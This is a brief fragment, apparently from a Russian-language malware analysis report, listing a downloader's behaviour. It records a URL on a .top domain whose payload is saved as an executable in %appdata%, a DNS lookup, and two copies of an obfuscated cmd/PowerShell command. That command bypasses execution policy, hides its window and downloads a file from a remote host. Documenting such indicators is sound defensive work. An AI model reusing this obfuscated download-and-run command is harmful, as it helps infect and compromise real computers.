Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OWer^sHE^lL.ex^E -EXEc^utI^oNPoL^icy^ BYp^AsS ^-^nopr^O^fILE -^Wi^n^DoWst^y^Le hI^Dden^ (N^e^w-O^b^jE^c^t^ ^s^y^s^Te^m.n^e^T.W^ebclIE^n^T^).^D^OwN^L^oAD^f^ILE('http://...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "p^OWer^sHE^lL.ex^E -EXEc^utI^oNPoL^icy^ BYp^AsS ^-^nopr^O^fILE -^Wi^n^DoWst^y^Le hI^Dden^ (N^e^w-O^b^jE^c^t^ ^s^y^s^Te^m.n^e^T.W^ebclIE^n^T^).^D^OwN^L^oAD^f^ILE('http://...' (со скрытым окном)